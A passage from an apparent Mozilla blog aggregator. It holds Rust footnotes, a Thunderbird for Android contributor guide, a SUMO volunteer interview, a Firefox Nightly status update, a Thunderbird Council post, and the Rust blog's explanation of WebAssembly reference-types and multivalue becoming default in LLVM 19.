  4. The simple solution — if a struct has mut fields, disallow overwriting it — is basically what C++ does with their const fields. Classes or structs with const fields are more limited in how you can use them. This works in C++ because they don’t wait until post-substitution to check templates for validity. ↩︎

  5. I love the Felleisen definition of “expressiveness”: two language features are equally expressive if one can be converted into the other with only local rewrites, which I generally interpret as “rewrites that don’t affect the function signature (or other abstraction boundary)”. ↩︎

  6. We can also make the !Overwrite impl implied by declaring fields mut, of course. This is fine for backwards compatibility, but isn’t the design I would want long-term, since it introduces an odd “step change” where declaring one field as mut implicitly declares all other fields as immutable (and, conversely, deleting the mut keyword from that field has the effect of declaring all fields, including that one, as mutable). ↩︎

  7. The Self type in traits is exempt from the Sized default, and it could be exempt from the Overwrite default as well, unless the trait is declared as Sized↩︎

  8. Hat tip to TC, who pointed this out to me. ↩︎

Mozilla ThunderbirdContribute to Thunderbird for Android

The wait is almost over! Thunderbird for Android will be here soon. As an open-source project, we could not succeed without the incredible volunteer contributors who help us along the way. Whether you’re a fan of problem-solving, localization, testing, development, or even just spreading the word, there’s a role for you in our community. Contributing doesn’t just benefit us – it’s a great way to grow your own skills and make a real difference in the lives of thousands of Thunderbird users worldwide. However you choose to contribute to Thunderbird for Android, we’re always happy to welcome new friends to the project!

Support

If you’re a natural at getting to the root of problems, consider becoming a support contributor!

When you answer a support question, you’re not only helping the person who asked the question, you’re helping the hundreds if not thousands of people who read it. Or if you like writing and editing, you can help with our knowledge base (KB) articles!

Support for Thunderbird on Android will live on Mozilla Support, aka SUMO, just like support for the Desktop application, but under its own product tile. We’ve put together a guide to get you started on SUMO, from setting up an account and finding questions to best practices, whether you to decide to help in the question forums or in the KB articles. Want to talk to other support volunteers? Join us on our Support Crew Matrix channel.

Localization

Thunderbird’s users are all over the world, and our localization contributors put the app and support articles in their language. Thunderbird for Android’s localization lives on Weblate, copyleft libre continuous localization that powers many other open source projects. If you haven’t used Weblate before, they have a useful guide for getting started.

Testing

If you want to try the newest features and help us polish and perfect them before they make it to a general release, join us as a tester. Testers are comfortable using daily and beta releases and providing meaningful feedback to developers.

When they’re available, you can download the Thunderbird for Android Beta releases from the Google Play Store or from GitHub under the ‘Pre-Release’. F-Droid users will need to manually select beta versions. To get update notification for non-suggested versions you need to check ‘Settings > Expert mode > Unstable updates’ in the F-Droid app.

Just like Thunderbird for desktop, we have a mailing list where you can give feedback and talk to developers and fellow beta testers.

Development

Interested at helping at the code level? All our development happens on our GitHub page, where you can read our code contributor section in our CONTRIBUTING.md page.

Look for issues that are tagged ‘good first issue,’ even if you’re an experienced developer but are new to Thunderbird for Android. Use the android-planning mailing list to talk to and get feedback from other developers.

Promote Thunderbird for Android

Spreading the word about Thunderbird for Android is an essential way to contribute, and there are many ways to do this. You can leave us a positive review on the Google Play Store (if you had a positive experience, of course) and encourage others to download and try Thunderbird for Android. This could be friends or family, a local computer club, or any other group you could think of! We’d love to hear your ideas and find a way to support you on the android-planning mailing list.

Financial Support

Financial support is a fantastic way to ensure the project continues to thrive. Your gift goes toward improving features, fixing bugs, and expanding the app’s functionality for all of its users.

By supporting Thunderbird financially, you’re investing in open-source software that respects your privacy and gives you control over your data. Every contribution, no matter how small, helps us maintain our independence and stay true to our mission.

The post Contribute to Thunderbird for Android appeared first on The Thunderbird Blog.

Support.Mozilla.OrgContributor spotlight – Noah Y

Hey everybody,

In today’s edition of our Contributor Spotlight, I’m thrilled to introduce you to Noah Y, a longtime contributor to our community forums. Noah’s excellence lies in his eagle-eyed investigation, most recently demonstrated when he identified that NordVPN’s web protection feature was causing Firefox auto-updates to fail. Thanks to his thorough investigation, the issue was escalated, and the SUMO content team was able to create a troubleshooting article to address the issue. In the end, NordVPN was able to resolve the problem after one of our engineers filed a support ticket with their team.

… So the way I decide if it’s worth escalating is if it affects any major/popular service or website. Because then I know thousands & possibly millions of Firefox users could be hitting the same bug quietly becoming very angry or frustrated each time they run into the problem.

Q: Please tell us about yourself

I love troubleshooting tough problems. And I love working with tech. Computers, TVs, you name it. I would take apart any electronics just on a small hope I could fix them or at least clean out the tons of dust hiding in them. I’m always intrigued by cars, tech & software. Despite this big interest, I never pursued an engineering or computer science degree. Which leaves me wishing I knew how to code. But if I did, it might have become too much of an obsession since I would want to fix everything that annoys me in my favorite software. So I’m happy I didn’t go down that path.

Q: I believe you’ve been involved with Mozilla since SUMO started. Can you tell us more about how you started contributing and what motivates you to keep going until now?

That’s right. I did start way back in 2004 by testing Firefox Nightly builds on a very cool forum community called MozillaZine Forums. Everyone helped report bugs & issues that needed to be fixed. I was good at that. Seeing those bugs get fixed was very satisfying & motivating.

But I never provided true support on those forums, I just helped test & confirm other people’s bugs/issues. The community there was very engaging & still is to this day over 20 yrs later.

I think how I got started contributing to SUMO in 2008 when it first launched, was by just answering a few questions by chance & seeing what would happen. I think I also felt bad at the time there were so many questions being asked with only a few helpers. It looked overwhelming. I mostly remember a ton of questions about Firefox crashes & homepage/search engine hijacking by malware or bad add-ons.

Q: Can you describe your workflow when working on the forum? 

I try to jump around in the forums looking for missed genuine questions where the user looks really troubled but also gives a sense that they will reply. Anyone who cares enough to reply back to us once we respond is always someone I’m very interested in helping. Depending on their skills, they can also report back to us what setting, add-on or 3rd party software broke Firefox for them. So that can help us solve many more questions about the same issue.

Q: Can you share your tips and tricks for handling a difficult user on the forum? What’s your advice for other community members to avoid being overwhelmed with so many things to do?

I would say try to relate to the angry user’s frustration & let them know you understand how bad/annoying of a situation this is. I usually make it a point to let them know of past & recent issues where a website, add-on, or 3rd party software broke Firefox & that it’s not always Firefox’s fault when something breaks. There is a perception out there that every annoying issue is caused by Firefox itself or a Firefox update. This doesn’t calm down every angry user but for the reasonable users, they now understand that the blame is either shared or coming from the other side entirely.

For overwhelmed forum helpers, my advice is to reduce how many questions you respond to. I’m always surprised by how many new questions are posted daily & how I realize that not all of them are going to get solved. With that understanding, I have made my peace with only helping as many people as I can without feeling like I’m going to burnout.

Q: You have a knack in noticing a trending topic on the forum. Do you have a specific way to keep track of issues and how can you tell if an issue is worth escalating?

Thank you! I wasn’t sure if anyone else noticed that. It’s a blessing & a curse. Because once I discover a trending topic like that, I keep collecting as much info as possible & keep drilling into the details until I unlock a clue. And I won’t stop until we solve it or it’s ruled so hopeless that no one can fix it. It’s honestly like detective work.

I try to keep notes & a list of all the questions encountering the trending issue in a basic text document. Pretty old school. I may need a cooler tool to help organize & visualize this data. :) And as I keep tracking the issue & noticing more & more people appearing with the same issue, it becomes personal for me.

Because I used to be that user, suffering from some insane problem that was driving me crazy and it disrupted my work or enjoyment of the internet and absolutely nothing would solve it. When a problem becomes that severe, I realized that no one’s going to do anything about it until you start making a lot of noise & sounding the alarm bells & contacting the right people in power to help confirm, prioritize and get as many staff needed to get it fixed. Which by the way, is very awesome. As you can not easily escalate issues like this in other companies unless you are a staff member. Even then, the issue can still fall through the cracks unless you reach exactly the right person.

So the way I decide if it’s worth escalating is if it affects any major/popular service or website. Because then I know thousands & possibly millions of Firefox users could be hitting the same bug quietly becoming very angry or frustrated each time they run into the problem. Eventually they’ll become fatigued & come to the SUMO forums to vent about it or plead their desperation for getting it fixed as its ruining their lives in a lot of important areas (Can’t login to bank site, can’t watch movie/tv shows, can’t pay bills, can’t login to webmail, can’t access Medicare/Social security site, etc.). I try to proactively hunt these issues down before they become major trends. :)

Q: Given your experience, can you mention one or two things that you would consider helpful for SUMO contributors to know, based on your experience in the community forums?

That the browser is always changing & websites aren’t making sure they work in Firefox anymore. So it’s going to become more noticeable in the questions they see that certain websites are going to break more often & add-ons are going to break websites as well.

My advice would be to treat all antivirus software & all add-ons as the source of a weird issue the user is seeing. 95%+ of all problems dealing with websites not working or having a weird glitch are caused by add-ons, antivirus add-ons or the antivirus software itself intercepting all the internet traffic & blocking the wrong things causing the website to fail in Firefox.

Q: What excites you the most about Firefox development these days?

How there seems to be a refocused & dedicated effort to fix things that users are annoyed with & to build features they actually want.

Q: What are the biggest challenges you’re facing as a SUMO contributor at the moment? What would you like to see from us in the future?

SUMO is a great community and I think we just need a few more tools to reduce repetitive tasks. One idea is to be able to save personal canned responses for each forum helper so they don’t have to copy & paste them from their personal notes. Another could be to help us view a more cleanly formatted list of a user’s add-on in the System Details area. So we can take a look quickly without parsing a very large amount of JSON to find that information.

The biggest challenge I feel like is not knowing if a user had their problem resolved. Since the way people interact with forums has changed thanks to social media, they don’t really have the time to come back & post a reply. So sometimes they just give a thumbs up to our post. Which makes me wonder, does that mean my answer solved their problem? I think the thumbs up is the new way of saying your answer solved their issue. So maybe surfacing that information in a easy to see place will help me know my impact on resolving problems.

Jscher did something clever about that on his “My Questions” SUMO Contributor tool that shows a heart emoji/❤️at the top of your post if any user liked/your post.

Q: Can you tell us a story about the most rewarding moment and impactful contribution you’ve made in SUMO?

This is a tough but good question. It’s kinda hard to remember since I can’t search my answers past a certain point. But there have been a few big battles where I’ve totally forgot that I helped with. Thankfully Bugzilla has a lot of the big ones I helped solve.

One big moment was helping identify the cause of Firefox autoupdates failing for many users & they kept getting error popups about the failed updates. I could see this was going to get worse fast so I filed a bug and included as much of my findings as I could. And a Firefox dev (the awesome Nick Alexander) confirmed my findings & escalated the bug to NordVPN. It took a while (3 weeks) but NordVPN finally fixed it.

I think the most impactful contribution was giving feedback & filing bugs about site enhancements, moderation tools and site usability to SUMO over the years to make it easier & more productive for users, contributors and moderators to use the site. Special shout out to the team who originally built SUMO & helped build all our ideas into reality: Kadir Topal, Ricky Rosario, Mike Cooper, Will Kahn-Greene and Rehan Dalal. I really couldn’t have gotten anything done without this amazing team.

Q: You’ve had a few chances to meet with SUMO staff and other contributors in the past. Can you tell us more about the most productive in-person event or meeting you’ve had? What value did you get from these events?

These in-person events have been amazing. Maybe I can even say life changing because I was able to meet genuinely good people that I was able to call friends and some best friends. From what I’ve seen, Mozilla has the tendency to attract very smart people but also ones who help develop you into a better person through all the interactions you have with them.

Q: What advice would you give to someone new who wants to contribute to SUMO?

Take your time contributing. You don’t have to rush out a specific number of answers or KB article edits a day. You don’t even have to volunteer to help every day of the week. Work at your own pace. Either super slow, regular slow or just average speed. The Knowledge Base where all our support articles live will always be there. So you don’t have to rush to 100% completion to translate them to your locale. And on the forum side, the amount of questions that come to the SUMO platform are endless. Worse than that, not everyone you provide an answer to will respond back. So you may have wasted a lot of time customizing & curating a really good answer for someone, just to have them never respond at all or just put a simple thumbs down vote on your post. That’s happened to me quite a few times & I didn’t love it. So you could use my motto: Quality over quantity. A few quality posts here & there over posting 50 quick answers to which no one might reply.

That strategy/mantra will help you from burning out quickly.

And to counteract that missing feeling of engagement, I cherry pick forum questions that I think have a higher chance of reply based on how the person has stated their problem & if they seem invested in getting an answer. It’s tricky to do & you don’t always get it right. But developing this skill over time can help you respond to better people who will engage back with you & actually let you know if your advice helped or failed them. Which is where I get the most satisfaction from.


I hope you enjoy your read. If you’re interested in joining our product community just like Noah, please go to our contribute page to learn more. You can also reach out to us through the following channels:

SUMO contributor discussions: https://support.mozilla.org/forums/
SUMO Matrix room: https://matrix.to/#/#sumo:mozilla.org
Twitter/X: https://x.com/SUMO_Mozilla

 

 

Firefox NightlyFrom ESR to Address Bar – These Weeks in Firefox: Issue 168

Highlights

  • ESR115 EOL was extended for Win 7-8.1 and macOS 10.12-10.14 to March 2025. See the firefox-dev post for more details. This doesn’t impact next month’s planned migration to ESR128 for other OSes, however.
  • The topic selection experiment is running! Firefox users in the treatment branch will see a dialog asking if they want to choose specific topics to appear in their story recommendations:

  • There has been a lot of work on various parts of ScotchBonnet for the Address Bar. We will be looking to enable this in Nightly soon, so anyone wanting a sneak peek can toggle browser.urlbar.scotchBonnet.enableOverride to true. Bug reports and feedback are welcome!
  • mconley fixed a bug with the experimental automatic Picture-in-Picture feature that caused a perma-spinner to appear when tearing a tab out.

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug

  • Jonas Jenwald [:Snuffleupagus]

Project Updates

Accessibility

  • :eeejay has landed ARIA Element reflection that allows ARIA relationship attributes to be set in JavaScript by directly referencing target elements. In particular, it will allow setting ARIA relationship attributes to work across Shadow DOM boundaries (with limitations). It is now available behind the pref accessibility.ARIAElementReflection.enabled and is getting ready to be shipped (bug).

DevTools

DevTools Toolbox
  • Julian Descottes fixed an issue where your plugged-in phone might not be detected in about:debugging (#1899330)
  • Alexandre Poirot added a new panel in the Tracer sidebar where we display the DOM event types that were emitted and let you filter them out (#1908615)

Lint, Docs and Workflow

Migration Improvements (read-only)

  • fchasen launched the experiment to encourage Firefox users without a Mozilla account to create one and sync, in order to have a safeguard against sudden hardware failure. We’re already seeing an uptick in accounts being created, and we’re eager for the experiment to conclude to determine which messaging variant had the most impact!
  • For backup, mconley landed some patches to disable backing up various history-related data stores if Firefox is configured to clear history on shutdown. There are also a series of patches in review to regenerate backups when users intentionally delete certain data.
  • mconley is working with the OMC team to develop a new simple messaging surface inside of the AppMenu panel to try some different variants of the “signed out” state for the accounts item at the top of the menu

New Tab Page

  • The thumbs up / thumbs down experiment is also running to let users in the treatment branch express which stories have value for them, and which don’t:

  • The layout variant experiments we mentioned during the last meeting are slated to start running in early October once Firefox 131 goes out the door!
  • Scott and Max are currently working on migrating us from our legacy endpoints for Top Sites and sponsored stories to a more centralized endpoint.
  • Amy and Nathan are working on the “big rectangle” – a new tall card group type that we’ll be experimenting with in a few months once this capability hits release

Picture-in-Picture

Search and Navigation

  • ScotchBonnet updates
    • Contextual Search will now enter a persistent search mode session when you search on a site that provides opensearch 1893071
    • Daisuke added the ability to access search pages directly with shift click, this behaviour was introduced after lot of user feedback on the current one off bar @ 1915250
    • We can and will only show persisted search terms on built in engines, to make sure 3rd party search engines cant trick users @ 1918176
    • As well as a large number of more general improvements and bug fixes @ 1913205, 1913200, 1914604, 1917186
  • Drew has made a lot of improvements to Firefox Suggest
    • Integrating Rust exposure suggestions as part of new experiment framework @ 1915317
    • Allowed suggest to be enabled in non suggest locales @ 1916873
    • Fixed issue with few results being shown when suggest is enabled @ 1916458
    • And various other improvements
  • Mark has landed large refactorings of search search tests @ 1912051, 1917955  along with preparations to implement the search engine selector in Rust to share with mobile @ 1914145
  • Mandy also cleaned up some of the stale code left from the search configuration update @ 1916847
  • Marco landed a bug to fix issues caused by the urlbar moving on mouse focus that caused issues with double click @ https://bugzilla.mozilla.org/show_bug.cgi?id=1909189

Mozilla ThunderbirdVIDEO: The Thunderbird Council

The Thunderbird Council is an important part of the Thunderbird story, and one of the main reasons we’re still around. In this month’s office hours, we sat down to chat with one of the very first Thunderbird Council members, Patrick Cloke, and one of the newest, Danny Colin, to discuss what this key group does and offers advice for those thinking about running in future elections.

Next month, we’ll put out a call for questions on social media and on the relevant TopicBox mailing lists for our next Office Hours, which will feature Ryan Sipes, Managing Director of Product at MZLA and Mark Surman, executive director of the Mozilla Foundation!

September Office Hours: The Thunderbird Council

While Thunderbird has been around almost 20 years, the Council hasn’t always been a part of it. In 2012, Mozilla discontinued support for Thunderbird as a product, but our community stepped in. In 2014, core contributors met in Toronto and elected the first Thunderbird Council to guide the project. For many years, the council was responsible for the day-to-day responsibilities, including development, budgeting, and hiring. While MZLA now handles those operations, the council has an even more crucial role. In the video, Danny and Patrick explain how the modern-day council works with MZLA and serves as the community’s voice.

Want to know more about what council members do, or who can run for council? Our guests provide honest and encouraging answers to these questions. Basically, if you’re an active contributor who cares about Thunderbird, you might consider running!

Watch, Read, and Get Involved

We’re so grateful to Danny and Patrick for joining us! We hope this video helps explain more about the Thunderbird Council’s role, and even encourages some of you who are active Thunderbird contributors to consider running in the future. And if you’re not an active contributor yet, go to our website to learn how to get involved!

VIDEO (Also on Peertube):

Thunderbird Council Resources:

The post VIDEO: The Thunderbird Council appeared first on The Thunderbird Blog.

The Rust Programming Language BlogWebAssembly targets: change in default target-features

The Rust compiler has recently upgraded to using LLVM 19 and this change accompanies some updates to the default set of target features enabled for WebAssembly targets of the Rust compiler. Beta Rust today, which will become Rust 1.82 on 2024-10-17, reflects all of these changes and can be used for testing.

WebAssembly is an evolving standard where extensions are being added over time through a proposals process. WebAssembly proposals reach maturity, get merged into the specification itself, get implemented in engines, and remain this way for quite some time before producer toolchains (e.g. LLVM) update to enable these sufficiently-mature proposals by default. In LLVM 19 this has happened with the multi-value and reference-types proposals for the LLVM/Rust target features multivalue and reference-types. These are now enabled by default in LLVM and transitively means that it's enabled by default for Rust as well.

WebAssembly targets for Rust now have improved documentation about WebAssembly proposals and their corresponding target features. This post is going to review these changes and go into depth about what's changing in LLVM.

WebAssembly Proposals and Compiler Target Features

WebAssembly proposals are the formal means by which the WebAssembly standard itself is evolved over time. Most proposals need toolchain integration in one form or another, for example new flags in LLVM or the Rust compiler. The -Ctarget-feature=... mechanism is used to implement this today. This is a signal to LLVM and the Rust compiler which WebAssembly proposals are enabled or disabled.

There is a loose coupling between the name of a proposal (often the name of the github repository of the proposal) and the feature name LLVM/Rust use. For example there is the multi-value proposal but a multivalue feature.

The lifecycle of the implementation of a feature in Rust/LLVM typically looks like:

  1. A new WebAssembly proposal is created in a new repository, for example WebAssembly/foo.
  2. Eventually Rust/LLVM implement the proposal under -Ctarget-feature=+foo
  3. Eventually the upstream proposal is merged into the specification, and WebAssembly/foo becomes an archived repository
  4. Rust/LLVM enable the -Ctarget-feature=+foo feature by default but typically retain the ability to disable it as well.

The reference-types and multivalue target features in Rust are at step (4) here now and this post is explaining the consequences of doing so.

Enabling Reference Types by Default

The reference-types proposal to WebAssembly introduced a few new concepts to WebAssembly, notably the externref type which is a host-defined GC resource that WebAssembly cannot access but can pass around. Rust does not have support for the WebAssembly externref type and LLVM 19 does not change that. WebAssembly modules produced from Rust will continue to not use the externref type nor have a means of being able to do so. This may be enabled in the future (e.g. a hypothetical core::arch::wasm32::Externref type or similar), but it will mostly likely only be done on an opt-in basis and will not affect preexisting code by default.

Also included in the reference-types proposal, however, was the ability to have multiple WebAssembly tables in a single module. In the original version of the WebAssembly specification only a single table was allowed and this restriction was relaxed with the reference-types proposal. WebAssembly tables are used by LLVM and Rust to implement indirect function calls. For example function pointers in WebAssembly are actually table indices and indirect function calls are a WebAssembly call_indirect instruction with this table index.

With the reference-types proposal the binary encoding of call_indirect instructions was updated. Prior to the reference-types proposal call_indirect was encoded with a fixed zero byte in its instruction (required to be exactly 0x00). This fixed zero byte was relaxed to a 32-bit LEB to indicate which table the call_indirect instruction was using. For those unfamiliar LEB is a way of encoding multi-byte integers in a smaller number of bytes for smaller integers. For example the 32-bit integer 0 can be encoded as 0x00 with a LEB. LEBs are flexible to additionally allow "overlong" encodings so the integer 0 can additionally be encoded as 0x80 0x00.

LLVM's support of separate compilation of source code to a WebAssembly binary means that when an object file is emitted it does not know the final index of the table that is going to be used in the final binary. Before reference-types there was only one option, table 0, so 0x00 was always used when encoding call_indirect instructions. After reference-types, however, LLVM will emit an over-long LEB of the form 0x80 0x80 0x80 0x80 0x00 which is the maximal length of a 32-bit LEB. This LEB is then filled in by the linker with a relocation to the actual table index that is used by the final module.

When putting all of this together, it means that with LLVM 19, which has the reference-types feature enabled by default, any WebAssembly module with an indirect function call (which is almost always the case for Rust code) will produce a WebAssembly binary that cannot be decoded by engines and tooling that do not support the reference-types proposal. It is expected that this change will have a low impact due to the age of the reference-types proposal and breadth of implementation in engines. Given the multitude of WebAssembly engines, however, it's recommended that any WebAssembly users test out Rust 1.82 beta and see if the produced module still runs on their engine of choice.

LLVM, Rust, and Multiple Tables

One interesting point worth mentioning is that despite the reference-types proposal enabling multiple tables in WebAssembly modules this is not actually taken advantage of at this time by either LLVM or Rust. WebAssembly modules emitted will still have at most one table of functions. This means that the over-long 5-byte encoding of index 0 as 0x80 0x80 0x80 0x80 0x00 is not actually necessary at this time. LLD, LLVM's linker for WebAssembly, wants to process all LEB relocations in a similar manner which currently forces this 5-byte encoding of zero. For example when a function calls another function the call instruction encodes the target function index as a 5-byte LEB which is filled in by the linker. There is quite often more than one function so the 5-byte encoding enables all possible function indices to be encoded.

In the future LLVM might start using multiple tables as well. For example LLVM may have a mode in the future where there's a table-per-function type instead of a single heterogenous table. This can enable engines to implement call_indirect more efficiently. This is not implemented at this time, however.

For users who want a minimally-sized WebAssembly module (e.g. if you're in a web context and sending bytes over the wire) it's recommended to use an optimization tool such as wasm-opt to shrink the size of the output of LLVM. Even before this change with reference-types it's recommended to do this as wasm-opt can typically optimize LLVM's default output even further. When optimizing a module through wasm-opt these 5-byte encodings of index 0 are all shrunk to a single byte.

Enabling Multi-Value by Default

The second feature enabled by default in LLVM 19 is multivalue. The multi-value proposal to WebAssembly enables functions to have more than one return value for example. WebAssembly instructions are additionally allowed to have more than one return value as well. This proposal is one of the first to get merged into the WebAssembly specification after the original MVP and has been implemented in many engines for quite some time.

The consequences of enabling this feature by default in LLVM are more minor for Rust, however, than enabling the reference-types feature by default. LLVM's default C ABI for WebAssembly code is not changing even when multivalue is enabled. Additionally Rust's extern "C" ABI for WebAssembly is not changing either and continues to match LLVM's (or strives to, differences to LLVM are considered bugs to fix). Despite this though the change has the possibility of still affecting Rust users.

Rust for some time has supported an extern "wasm" ABI on Nightly which was an experimental means of exposing the ability of defining a function in Rust which returned multiple values (e.g. used the multi-value proposal). Due to infrastructural changes and refactorings in LLVM itself this feature of Rust has been removed and is no longer supported on Nightly at all. As a result there is no longer any possible method of writing a function in Rust that returns multiple values at the WebAssembly function type level.

In summary this change is expected to not affect any Rust code in the wild unless you were using the Nightly feature of extern "wasm" in which case you'll be forced to drop support for that and use extern "C" instead. Supporting WebAssembly multi-return functions in Rust is a broader topic than this post can cover, but at this time it's an area that's ripe for contribution from suitably motivated contributors.

Aside: ABI Stability and WebAssembly

While on the topic of ABIs and the multivalue feature it's perhaps worth also going over a bit what ABIs mean for WebAssembly. The current definition of the extern "C" ABI for WebAssembly is documented in the tool-conventions repository and this is what Clang implements for C code as well. LLVM implements enough support for lowering to WebAssembly as well to support all of this. The extern "Rust ABI is not stable on WebAssembly, as is the case for all Rust targets, and is subject to change over time. There is no reference documentation at this time for what extern "Rust" is on WebAssembly.

The extern "C" ABI, what C code uses by default as well, is difficult to change because stability is often required across different compiler versions. For example WebAssembly code compiled with LLVM 18 might be expected to work with code compiled by LLVM 20. This means that changing the ABI is a daunting task that requires version fields, explicit markers, etc, to help prevent mismatches.

The extern "Rust" ABI, however, is subject to change over time. A great example of this could be that when the multivalue feature is enabled the extern "Rust" ABI could be redefined to use the multiple-return-values that WebAssembly would then support. This would enable much more efficient returns of values larger than 64-bits. Implementing this would require support in LLVM though which is not currently present.

This all means that actually using multiple-returns in functions, or the WebAssembly feature that the multivalue enables, is still out on the horizon and not implemented. First LLVM will need to implement complete lowering support to generate WebAssembly functions with multiple returns, and then extern "Rust" can be change to use this when fully supported. In the yet-further-still future C code might be able to change, but that will take quite some time due to its cross-version-compatibility story.

Enabling Future Proposals to WebAssembly

This is not the first time that a WebAssembly proposal has gone from off-by-default to on-by-default in LLVM, nor will it be the last. For example LLVM already enables the sign-extension proposal by default which MVP WebAssembly did not have. It's expected that in the not-too-distant future the nontrapping-fp-to-int proposal will likely be enabled by default. These changes are currently not made with strict criteria in mind (e.g. N engines must have this implemented for M years), and there may be breakage that happens.

If you're using a WebAssembly engine that does not support the modules emitted by Rust 1.82 beta and LLVM 19 then your options are:

  • Try seeing if the engine you're using has any updates available to it. You might be using an older version which didn't support a feature but a newer version supports the feature.
  • Open an issue to raise awareness that a change is causing breakage. This could either be done on your engine's repository, the Rust repository, or the WebAssembly tool-conventions repository. It's recommended to first search to confirm there isn't already an open issue though.
  • Recompile your code with features disabled, more on this in the next section.

The general assumption behind enabling new features by default is that it's a relatively hassle-free operation for end users while bringing performance benefits for everyone (e.g. nontrapping-fp-to-int will make float-to-int conversions more optimal). If updates end up causing hassle it's best to flag that early on so rollout plans can be adjusted if needed.

Disabling on-by-default WebAssembly proposals

For a variety of reasons you might be motivated to disable on-by-default WebAssembly features: for example maybe your engine is difficult to update or doesn't support a new feature. Disabling on-by-default features is unfortunately not the easiest task. It is notably not sufficient to use -Ctarget-features=-sign-ext to disable a feature for just your own project's compilation because the Rust standard library, shipped in precompiled form, is still compiled with the feature enabled.

To disable on-by-default WebAssembly proposal it's required that you use Cargo's -Zbuild-std feature. For example:

$ export RUSTFLAGS=-Ctarget-cpu=mvp
$ cargo +nightly build -Zbuild-std=panic_abort,std --target wasm32-unknown-unknown

This will recompiled the Rust standard library in addition to your own code with the "MVP CPU" which is LLVM's placeholder for all WebAssembly proposals disabled. This will disable sign-ext, reference-types, multi-value, etc.